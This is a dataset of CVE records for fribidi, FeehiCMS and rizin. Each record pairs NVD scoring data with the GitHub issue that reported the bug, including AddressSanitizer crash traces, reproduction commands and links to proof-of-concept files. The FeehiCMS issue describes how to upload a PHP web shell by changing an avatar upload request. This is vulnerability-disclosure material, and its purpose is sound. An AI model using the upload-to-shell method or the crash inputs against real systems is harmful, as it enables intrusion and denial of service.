#2 0x559f11676b5e in main (/home/lin/fribidi/bin/fribidi+0x5b5e)
#3 0x7f7d5fd4bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x559f11675d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29)
0x61500000007c is located 4 bytes to the left of 512-byte region [0x615000000080,0x615000000280)
allocated by thread T0 here:
#0 0x7f7d601f9b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x559f11680853 in init_cap_rtl (/home/lin/fribidi/bin/fribidi+0xf853)
#2 0x559f116812b0 in fribidi_cap_rtl_to_unicode (/home/lin/fribidi/bin/fribidi+0x102b0)
#3 0x559f1168019e in fribidi_charset_to_unicode (/home/lin/fribidi/bin/fribidi+0xf19e)
#4 0x559f11676b5e in main (/home/lin/fribidi/bin/fribidi+0x5b5e)
#5 0x7f7d5fd4bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode
Shadow bytes around the buggy address:
0x0c2a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c2a7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==10552==ABORTING
```
poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761411/poc.zip)
Thanks !!! | heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode | https://api.github.com/repos/fribidi/fribidi/issues/182/comments | 3 | 2021-12-22T09:07:41Z | 2022-04-19T19:55:33Z | https://github.com/fribidi/fribidi/issues/182 | 1,086,608,926 | 182 | 4,096 |
CVE-2022-25310 | 2022-09-06T18:15:11.557 | A segmentation fault (SEGV) flaw was found in the Fribidi package and affects the fribidi_remove_bidi_marks() function of the lib/fribidi.c file. This flaw allows an attacker to pass a specially crafted file to Fribidi, leading to a crash and causing a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25310"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047923"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/183"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/pull/186"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25310"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047923"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/183"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/pull/186"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68",
"versionEndExcluding": "1.0.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/fribidi/fribidi/issues/183 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"fribidi",
"fribidi"
] | Hi, I found a bug, SEGV.
- SUMMARY:
SUMMARY: AddressSanitizer: SEGV (/home/lin/fribidi/bin/fribidi+0x66a5) in fribidi_remove_bidi_marks
- Version
```
➜ bin git:(master) ✗ ./fribidi --version
fribidi (GNU FriBidi) 1.0.11
interface version 4,
Unicode Character Database version 14.0.0,
Configure options.
Copyright (C) 2004 Sharif FarsiWeb, Inc.
Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod
Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld
GNU FriBidi comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of GNU FriBidi under
the terms of the GNU Lesser General Public License.
For more information about these matters, see the file named COPYING.
Written by Behdad Esfahbod and Dov Grobgeld
```
At branch 859aa1b
- Steps to reproduce
```
git clone https://github.com/fribidi/fribidi.git
cd fribidi
./autogen.sh
CFLAGS=-fsanitize=address ./configure --disable-shared
make
./bin/fribidi --test --novisual --basedir ./poc
```
- Platform
```
➜ bin git:(master) ✗ gcc --version
gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
➜ bin git:(master) ✗ uname -r
5.4.0-91-generic
➜ bin git:(master) ✗ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
```
- ASAN
```
➜ fribidi git:(master) ✗ ./bin/fribidi --test --novisual --basedir ~/id:000194,sig:06,src:001474,op:arg1,rep:4
ASAN:DEADLYSIGNAL
=================================================================
==10834==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cc8b6086a6 bp 0x7ffed6538790 sp 0x7ffed6538740 T0)
==10834==The signal is caused by a READ memory access.
==10834==Hint: address points to the zero page.
#0 0x55cc8b6086a5 in fribidi_remove_bidi_marks (/home/lin/fribidi/bin/fribidi+0x66a5)
#1 0x55cc8b607d17 in main (/home/lin/fribidi/bin/fribidi+0x5d17)
#2 0x7f41e828cbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#3 0x55cc8b606d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/home/lin/fribidi/bin/fribidi+0x66a5) in fribidi_remove_bidi_marks
==10834==ABORTING
```
poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761436/poc.zip)
Thanks !!! | SEGV on unknown address 0x000000000000 (pc 0x55cc8b6086a6 bp 0x7ffed6538790 sp 0x7ffed6538740 T0) | https://api.github.com/repos/fribidi/fribidi/issues/183/comments | 1 | 2021-12-22T09:10:25Z | 2022-03-30T19:03:07Z | https://github.com/fribidi/fribidi/issues/183 | 1,086,611,188 | 183 | 4,097 |
CVE-2020-21516 | 2022-09-06T19:15:08.290 | There is an arbitrary file upload vulnerability in FeehiCMS 2.0.8 at the head image upload, that allows attackers to execute relevant PHP code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/46"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/46"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "4AEB1B4F-33FF-4363-BB98-B7151666907B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/liufee/cms/issues/46 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | There is an arbitrary file upload vulnerability in the background avatar upload.
The CMS only verified the suffix of the file in the front end by js, and we found that we could upload the PHP scripts directly after using Burp Suite for package capture modification.

The attacker can modify the box in the picture and upload the PHP script directly, It also returns the upload path(In the red box on the right of the figure above).
When the PHP file content is a Trojan, attackers can get the shell directly.
Here I used Behinder as a shell management tool, and getshell successfully.



| Feehicms-2.0.8 can be attacked directly to getshell via the avatar uploads | https://api.github.com/repos/liufee/cms/issues/46/comments | 1 | 2019-12-04T15:49:47Z | 2019-12-24T15:56:11Z | https://github.com/liufee/cms/issues/46 | 532,772,076 | 46 | 4,098 |
CVE-2022-36039 | 2022-09-06T19:15:08.603 | Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to out-of-bounds write when parsing DEX files. A user opening a malicious DEX file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. A patch is available on the `dev` branch of the repository. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/1524f85211445e41506f98180f8f69f7bf115406"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2969"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-pr85-hv85-45pg"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/1524f85211445e41506f98180f8f69f7bf115406"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2969"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-pr85-hv85-45pg"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/rizinorg/rizin/issues/2969 | [
"Third Party Advisory"
] | github.com | [
"rizinorg",
"rizin"
] | Hi! We've been fuzzing your project and found the following errors in `librz/bin/format/dex/dex.c`
### Work environment
OS: Ubuntu 20.04
File format: -
rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9
### Bug description
1. Heap out-of-bounds write of size 1 in `dex.c:89:13`, Crash file:
[crash-b28a51055078fc0271ab6fb59956f709.zip](https://github.com/rizinorg/rizin/files/9394333/crash-b28a51055078fc0271ab6fb59956f709.zip)
2. Heap out-of-bounds write of size 1 in `dex.c:905:35`, Crash file: [crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be.zip](https://github.com/rizinorg/rizin/files/9394336/crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be.zip)
### Steps to reproduce
1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .`
2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash`
3. Execute rizin with crashing input (1): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-b28a51055078fc0271ab6fb59956f709`
4. You will see the following output:
```
=================================================================
==2537255==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ae98f at pc 0x000000b9ce28 bp 0x7ffd1f577e70 sp 0x7ffd1f577e68
WRITE of size 1 at 0x6020001ae98f thread T0
#0 0xb9ce27 in dex_string_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:89:13
#1 0xb9ce27 in dex_parse /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:545:23
#2 0xb9ce27 in rz_bin_dex_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:703:7
#3 0xb09545 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_dex.c:42:18
#4 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8
#5 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19
#6 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8
#7 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18
#8 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23
#9 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4
#10 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14
#11 0x7f151165f082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d)
0x6020001ae98f is located 1 bytes to the left of 1-byte region [0x6020001ae990,0x6020001ae991)
allocated by thread T0 here:
#0 0x498c9d in malloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498c9d)
#1 0xb9805e in dex_string_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:84:9
#2 0xb9805e in dex_parse /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:545:23
#3 0xb9805e in rz_bin_dex_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:703:7
#4 0xb09545 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_dex.c:42:18
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:89:13 in dex_string_new
Shadow bytes around the buggy address:
0x0c048002dce0: fa fa fd fa fa fa fd fa fa fa 02 fa fa fa fd fa
0x0c048002dcf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c048002dd00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00 00
0x0c048002dd10: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 01 fa
0x0c048002dd20: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 01 fa
=>0x0c048002dd30: fa[fa]01 fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dd50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dd60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dd70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dd80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2537255==ABORTING
```
5. Execute rizin with crashing input (2): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be`
6. You will see the following output:
```
=================================================================
==2537994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001aedcf at pc 0x000000ba19c6 bp 0x7ffde55982e0 sp 0x7ffde55982d8
WRITE of size 1 at 0x6020001aedcf thread T0
#0 0xba19c5 in dex_resolve_library /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:905:35
#1 0xba19c5 in rz_bin_dex_symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:1326:20
#2 0xae7bf4 in rz_bin_object_set_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:455:16
#3 0xae706b in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:319:2
#4 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19
#5 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8
#6 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18
#7 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23
#8 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4
#9 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14
#10 0x7f471e6ef082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d)
0x6020001aedcf is located 1 bytes to the left of 1-byte region [0x6020001aedd0,0x6020001aedd1)
allocated by thread T0 here:
#0 0x484594 in strdup (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x484594)
#1 0xba1747 in dex_resolve_library /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:903:20
#2 0xba1747 in rz_bin_dex_symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:1326:20
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:905:35 in dex_resolve_library
Shadow bytes around the buggy address:
0x0c048002dd60: fa fa 00 06 fa fa 00 06 fa fa fd fa fa fa 07 fa
0x0c048002dd70: fa fa 01 fa fa fa fd fa fa fa fd fa fa fa 06 fa
0x0c048002dd80: fa fa 01 fa fa fa 00 fa fa fa 02 fa fa fa 01 fa
0x0c048002dd90: fa fa 00 fa fa fa 07 fa fa fa 01 fa fa fa 00 fa
0x0c048002dda0: fa fa 07 fa fa fa 01 fa fa fa 00 fa fa fa 07 fa
=>0x0c048002ddb0: fa fa 06 fa fa fa 02 fa fa[fa]01 fa fa fa fa fa
0x0c048002ddc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002ddd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002dde0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002ddf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c048002de00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2537994==ABORTING
``` | Multiple heap out-of-bounds writes in dex.c | https://api.github.com/repos/rizinorg/rizin/issues/2969/comments | 0 | 2022-08-22T12:33:13Z | 2022-08-24T00:26:41Z | https://github.com/rizinorg/rizin/issues/2969 | 1,346,339,356 | 2,969 | 4,099 |
CVE-2022-36040 | 2022-09-06T20:15:08.603 | Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when getting data from PYC(python) files. A user opening a malicious PYC file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 68948017423a12786704e54227b8b2f918c2fd27 contains a patch. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/68948017423a12786704e54227b8b2f918c2fd27"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2963"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-h897-rhm9-rpmw"
},
{
"source": "security-advisories@github.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/68948017423a12786704e54227b8b2f918c2fd27"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2963"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-h897-rhm9-rpmw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-06"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/rizinorg/rizin/issues/2963 | [
"Third Party Advisory"
] | github.com | [
"rizinorg",
"rizin"
] | Hi! We've been fuzzing your project and found the following errors in `librz/bin/format/pyc/marshal.c`
### Work environment
OS: Ubuntu 20.04
File format: -
rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9
### Bug description
Heap out-of-bounds write (segv) of size 1 in `librz/bin/format/pyc/marshal.c:345` and `librz/bin/format/pyc/marshal.c:366`
### Steps to reproduce
1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .`
2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash`
3. Execute rizin with crashing input (1) (we sent all crashing inputs to you by email):
`/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-29b84af05a36d9628093200a1a07b7d931009c84`
4. Execute rizin with crashing input (2):
